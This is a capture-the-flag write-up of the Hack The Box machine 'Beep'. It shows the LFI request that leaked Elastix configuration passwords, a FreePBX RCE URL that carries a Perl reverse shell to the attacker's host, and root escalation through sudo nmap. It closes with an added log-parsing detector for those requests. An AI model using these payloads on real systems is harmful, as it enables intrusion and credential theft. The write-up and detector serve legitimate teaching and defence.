Beep
Contents
Ports scanning
root@kali:~/HTB/Machines/Beep# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.7 --rate=1000
Starting masscan 1.0.5 at 2019-11-15 15:03:24 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 110/tcp on 10.10.10.7
Discovered open port 10000/tcp on 10.10.10.7
Discovered open port 22/tcp on 10.10.10.7
Discovered open port 25/tcp on 10.10.10.7
Discovered open port 4445/tcp on 10.10.10.7
Discovered open port 3306/tcp on 10.10.10.7
Discovered open port 995/tcp on 10.10.10.7
Discovered open port 4190/tcp on 10.10.10.7
Discovered open port 4559/tcp on 10.10.10.7
Discovered open port 878/tcp on 10.10.10.7
Discovered open port 80/tcp on 10.10.10.7
Discovered open port 111/tcp on 10.10.10.7
Discovered open port 993/tcp on 10.10.10.7
Discovered open port 443/tcp on 10.10.10.7
Discovered open port 5038/tcp on 10.10.10.7
Discovered open port 143/tcp on 10.10.10.7
Discovered open port 10000/udp on 10.10.10.7
rate:  0.00-kpps, 100.00% done, waiting -290-secs, found=16
Nmap output for these ports:
# Nmap 7.80 scan initiated Fri Nov 15 10:14:31 2019 as: nmap -sC -sV -p22,25,80,110,111,143,443,878,993,995,3306,4190,4449,5038,10000,U:10000 -o nmap.txt 10.10.10.7
Nmap scan report for beep.htb (10.10.10.7)
Host is up (0.045s latency).

PORT      STATE  SERVICE     VERSION
22/tcp    open   ssh         OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open   smtp        Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp    open   http        Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://beep.htb/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp   open   pop3        Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: PIPELINING TOP UIDL RESP-CODES AUTH-RESP-CODE LOGIN-DELAY(0) STLS EXPIRE(NEVER) APOP IMPLEMENTATION(Cyrus POP3 server v2) USER
111/tcp   open   rpcbind     2 (RPC #100000)
143/tcp   open   imap        Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: IMAP4rev1 Completed RIGHTS=kxte STARTTLS UIDPLUS ANNOTATEMORE MULTIAPPEND X-NETSCAPE MAILBOX-REFERRALS CONDSTORE LIST-SUBSCRIBED LISTEXT ATOMIC NAMESPACE IMAP4 CHILDREN RENAME ID BINARY NO THREAD=ORDEREDSUBJECT IDLE CATENATE URLAUTHA0001 ACL THREAD=REFERENCES QUOTA SORT SORT=MODSEQ LITERAL+ UNSELECT OK
443/tcp   open   ssl/https?
|_ssl-date: 2019-11-15T16:15:20+00:00; +59m59s from scanner time.
878/tcp   open   status      1 (RPC #100024)
993/tcp   open   ssl/imap    Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open   pop3        Cyrus pop3d
3306/tcp  open   mysql       MySQL (unauthorized)
4190/tcp  open   sieve       Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4449/tcp  closed privatewire
5038/tcp  open   asterisk    Asterisk Call Manager 1.1
10000/tcp open   http        MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

Host script results:
|_clock-skew: 59m58s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov 15 10:17:57 2019 -- 1 IP address (1 host up) scanned in 205.91 seconds
Elastix
Elastix is a unified communications server that brings together IP PBX, email, IM, faxing and collaboration functionality. It has a web interface and includes capabilities such as call center software with predictive dialing. (https://en.wikipedia.org/wiki/Elastix)
Vulnerabilities
root@kali:~/HTB/Machines/Beep# searchsploit elastix
------------------------------------------------------------------ ----------------------------------------
 Exploit Title                                                    |  Path
                                                                  | (/usr/share/exploitdb/)
------------------------------------------------------------------ ----------------------------------------
Elastix - 'page' Cross-Site Scripting                             | exploits/php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities           | exploits/php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities     | exploits/php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion                  | exploits/php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection                                 | exploits/php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection                                | exploits/php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution            | exploits/php/webapps/18650.py
------------------------------------------------------------------ ----------------------------------------
Shellcodes: No Result
Papers: No Result
Elastix LFI vulnerability
root@kali:~/HTB/Machines/Beep# searchsploit -p 37637
  Exploit: Elastix 2.2.0 - 'graph.php' Local File Inclusion
      URL: https://www.exploit-db.com/exploits/37637
     Path: /usr/share/exploitdb/exploits/php/webapps/37637.pl
File Type: ASCII text, with CRLF line terminators
root@kali:~/HTB/Machines/Beep# cp /usr/share/exploitdb/exploits/php/webapps/37637.pl ./
In the exploit file we find the LFI URL:
#LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
root@kali:~/HTB/Machines/Beep# mkdir elasticlfi
root@kali:~/HTB/Machines/Beep# cd elasticlfi/
root@kali:~/HTB/Machines/Beep/elasticlfi# wget --no-check-certificate "https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action" -O amportal.conf
Connecting to 10.10.10.7:443... connected.
WARNING: The certificate of ‘10.10.10.7’ is not trusted.
WARNING: The certificate of ‘10.10.10.7’ doesn't have a known issuer.
WARNING: The certificate of ‘10.10.10.7’ has expired.
The certificate has expired
The certificate's owner does not match hostname ‘10.10.10.7’
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘amportal.conf’

amportal.conf           [ <=>                ]  13.46K  --.-KB/s    in 0.008s

2019-11-15 11:33:19 (1.65 MB/s) - ‘amportal.conf’ saved [13779]
We can repeat this for other files, for example /etc/passwd:
root@kali:~/HTB/Machines/Beep/elasticlfi# wget --no-check-certificate "https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action" -O passwd
The configuration file has some passwords:
root@kali:~/HTB/Machines/Beep/elasticlfi# cat amportal.conf | grep -v "#" | grep -v "^$"
AMPDBHOST=localhost
AMPDBENGINE=mysql
AMPDBUSER=asteriskuser
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
AMPMGRPASS=jEhdIekWmdjE
AMPBIN=/var/lib/asterisk/bin
AMPSBIN=/usr/local/sbin
AMPWEBROOT=/var/www/html
AMPCGIBIN=/var/www/cgi-bin
FOPWEBROOT=/var/www/html/panel
FOPPASSWORD=jEhdIekWmdjE
ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=jEhdIekWmdjE
AUTHTYPE=database
AMPADMINLOGO=logo.png
AMPEXTENSIONS=extensions
ENABLECW=no
ZAP2DAHDICOMPAT=true
MOHDIR=mohmp3
AMPMODULEXML=http://mirror.freepbx.org/
AMPMODULESVN=http://mirror.freepbx.org/modules/
AMPDBNAME=asterisk
ASTETCDIR=/etc/asterisk
ASTMODDIR=/usr/lib/asterisk/modules
ASTVARLIBDIR=/var/lib/asterisk
ASTAGIDIR=/var/lib/asterisk/agi-bin
ASTSPOOLDIR=/var/spool/asterisk
ASTRUNDIR=/var/run/asterisk
ASTLOGDIR=/var/log/asteriskSorry! Attempt to access restricted file.
From the passwd file we find the username fanis:
root@kali:~/HTB/Machines/Beep/elasticlfi# cat passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
spamfilter:x:500:500::/home/spamfilter:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
fanis:x:501:501::/home/fanis:/bin/bash
Sorry! Attempt to access restricted file.
Elastix portal access
It provides a lot of information.
Elastix Remote Code Execution
root@kali:~/HTB/Machines/Beep# searchsploit -p 18650
  Exploit: FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/18650
     Path: /usr/share/exploitdb/exploits/php/webapps/18650.py
File Type: Python script, ASCII text executable, with very long lines, with CRLF line terminators
root@kali:~/HTB/Machines/Beep# cp /usr/share/exploitdb/exploits/php/webapps/18650.py ./
This exploit is straightforward, but it needs a valid extension on the PBX to work.
root@kali:~/HTB/Machines/Beep# cat 18650.py | grep -v "^#" | grep -v "^^M"
import urllib
rhost="10.10.10.7"
lhost="10.10.14.34"
lport=443
extension="1000"
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
urllib.urlopen(url)
Find extension
There are several ways to find the extension.
Elastix portal
VoIP enumeration
root@kali:~/HTB/Machines/Beep# svwar -e100-9999 10.10.10.7
ERROR:TakeASip:SIP server replied with an authentication request for an unknown extension. Set --force to force a scan.
WARNING:root:found nothing
root@kali:~/HTB/Machines/Beep# svwar -m INVITE -e100-9999 10.10.10.7
WARNING:TakeASip:using an INVITE scan on an endpoint (i.e. SIP phone) may cause it to ring and wake up people in the middle of the night
WARNING:TakeASip:extension '704' probably exists but the response is unexpected
| Extension | Authentication |
------------------------------
| 704 | weird |
| 233 | reqauth |
Open listener
root@kali:~/HTB/Machines/Beep# rlwrap nc -lvp 443
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Run exploit
Modify the script with the correct extension (233):
root@kali:~/HTB/Machines/Beep# cat 18650.py | grep -v "^#" | grep -v "^^M"
import urllib
rhost="10.10.10.7"
lhost="10.10.14.34"
lport=443
extension="233"
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
urllib.urlopen(url)
Run it.
root@kali:~/HTB/Machines/Beep# python 18650.py
Traceback (most recent call last):
  File "18650.py", line 27, in <module>
    urllib.urlopen(url)
  File "/usr/lib/python2.7/urllib.py", line 87, in urlopen
    return opener.open(url)
  File "/usr/lib/python2.7/urllib.py", line 215, in open
    return getattr(self, name)(url)
  File "/usr/lib/python2.7/urllib.py", line 445, in open_https
    h.endheaders(data)
  File "/usr/lib/python2.7/httplib.py", line 1065, in endheaders
    self._send_output(message_body)
  File "/usr/lib/python2.7/httplib.py", line 892, in _send_output
    self.send(msg)
  File "/usr/lib/python2.7/httplib.py", line 854, in send
    self.connect()
  File "/usr/lib/python2.7/httplib.py", line 1290, in connect
    server_hostname=server_hostname)
  File "/usr/lib/python2.7/ssl.py", line 369, in wrap_socket
    _context=self)
  File "/usr/lib/python2.7/ssl.py", line 599, in __init__
    self.do_handshake()
  File "/usr/lib/python2.7/ssl.py", line 828, in do_handshake
    self._sslobj.do_handshake()
IOError: [Errno socket error] [SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:727)
The script fails with an unexpected SSL error (invalid certificate?), so instead of opening the URL we change the script to print the payload URL and fetch it with wget:
root@kali:~/HTB/Machines/Beep# cat 18650.py | grep -v "^#" | grep -v "^^M"
import urllib
rhost="10.10.10.7"
lhost="10.10.14.34"
lport=443
extension="233"
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
print(url)
Run again:
root@kali:~/HTB/Machines/Beep# python 18650.py
https://10.10.10.7/recordings/misc/callme_page.php?action=c&callmenum=233@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%2210.10.14.34%3a443%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A
root@kali:~/HTB/Machines/Beep# wget --no-check-certificate -O /dev/null `python 18650.py`
--2019-11-15 14:12:39--  https://10.10.10.7/recordings/misc/callme_page.php?action=c&callmenum=233@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%2210.10.14.34%3a443%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A
Connecting to 10.10.10.7:443... connected.
WARNING: The certificate of ‘10.10.10.7’ is not trusted.
WARNING: The certificate of ‘10.10.10.7’ doesn't have a known issuer.
WARNING: The certificate of ‘10.10.10.7’ has expired.
The certificate has expired
The certificate's owner does not match hostname ‘10.10.10.7’
HTTP request sent, awaiting response... 200 OK
Length: 1195 (1.2K) [text/html]
Saving to: ‘/dev/null’

/dev/null           100%[=======================================>]   1.17K  --.-KB/s    in 0s

2019-11-15 14:12:39 (14.2 MB/s) - ‘/dev/null’ saved [1195/1195]
And a reverse shell opens in the listener:
root@kali:~/HTB/Machines/Beep# rlwrap nc -lvp 443
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.7.
Ncat: Connection from 10.10.10.7:59911.
whoami
asterisk
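From the defender's side, the two requests used above leave distinctive traces in the Apache access log: a path-traversal string with a %00 terminator in the graph.php current_language parameter, and encoded CR/LF pairs followed by an Application: header inside the callme_page.php callmenum parameter. The following script is an added example, not part of the original writeup or the Elastix project; it parses constructed Common Log Format lines (the sample lines are made up here to mirror the requests shown above) and flags both patterns.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (not captured from the target). The first
# two mirror the graph.php LFI and callme_page.php requests shown in the
# writeup; the last two are benign requests to the same scripts.
SAMPLE_LOG = """\
10.10.14.34 - - [15/Nov/2019:11:33:19 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 13779
10.10.14.34 - - [15/Nov/2019:14:12:39 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=233@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO HTTP/1.1" 200 1195
10.10.14.50 - - [15/Nov/2019:14:20:00 +0000] "GET /vtigercrm/graph.php?current_language=en_us&module=Accounts&action HTTP/1.1" 200 4096
10.10.14.50 - - [15/Nov/2019:14:21:00 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=233@from-internal HTTP/1.1" 200 1195
"""

# Common Log Format: client, ident, user, [timestamp], "METHOD target HTTP/x", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def classify(target):
    """Return the set of findings for one request target (path + query)."""
    findings = set()
    query = unquote(urlsplit(target).query)   # single decode, as PHP does for $_GET
    if "../" in query or "..\\" in query:
        findings.add("path-traversal")
    if "\x00" in query:
        findings.add("null-byte")             # %00 truncation of the included path
    if "\r" in query or "\n" in query:
        findings.add("crlf-injection")        # raw line breaks in a query value
        if "application:" in query.lower():
            findings.add("asterisk-application-header")  # call-file header smuggled in
    return findings

def scan(log_text):
    """Parse log lines; return (ip, path, sorted findings) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify(m["target"])
        if findings:
            hits.append((m["ip"], urlsplit(m["target"]).path, sorted(findings)))
    return hits

if __name__ == "__main__":
    for ip, path, findings in scan(SAMPLE_LOG):
        print(f"{ip} {path} -> {', '.join(findings)}")
```

Only the query string is decoded once, matching how the PHP application would see the values; a double-encoded payload would need a second unquote pass before the checks.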
Privilege escalation
From the reverse shell, upgrade to a full TTY:
python -c 'import pty; pty.spawn("/bin/bash")'
bash-3.2$ CTRL Z
[1]+  Stopped                 rlwrap nc -lvp 443
root@kali:~/HTB/Machines/Beep# stty rows 24 columns 134
root@kali:~/HTB/Machines/Beep# stty raw -echo
root@kali:~/HTB/Machines/Beep# fg
rlwrap nc -lvp 443
bash-3.2$ export TERM=screen
export TERM=screen
The same exploit file explains how to escalate to root: the asterisk user is allowed to run nmap with sudo.
bash-3.2$ sudo -l
sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper
bash-3.2$ sudo nmap --interactive
sudo nmap --interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
User flag
sh-3.2# cat /home/fanis/user.txt
cat /home/fanis/user.txt
<USER FLAG>
Root flag
sh-3.2# cat /root/root.txt
cat /root/root.txt
<ROOT FLAG>
References
Daniel Simao 09:21, 15 November 2019 (EST)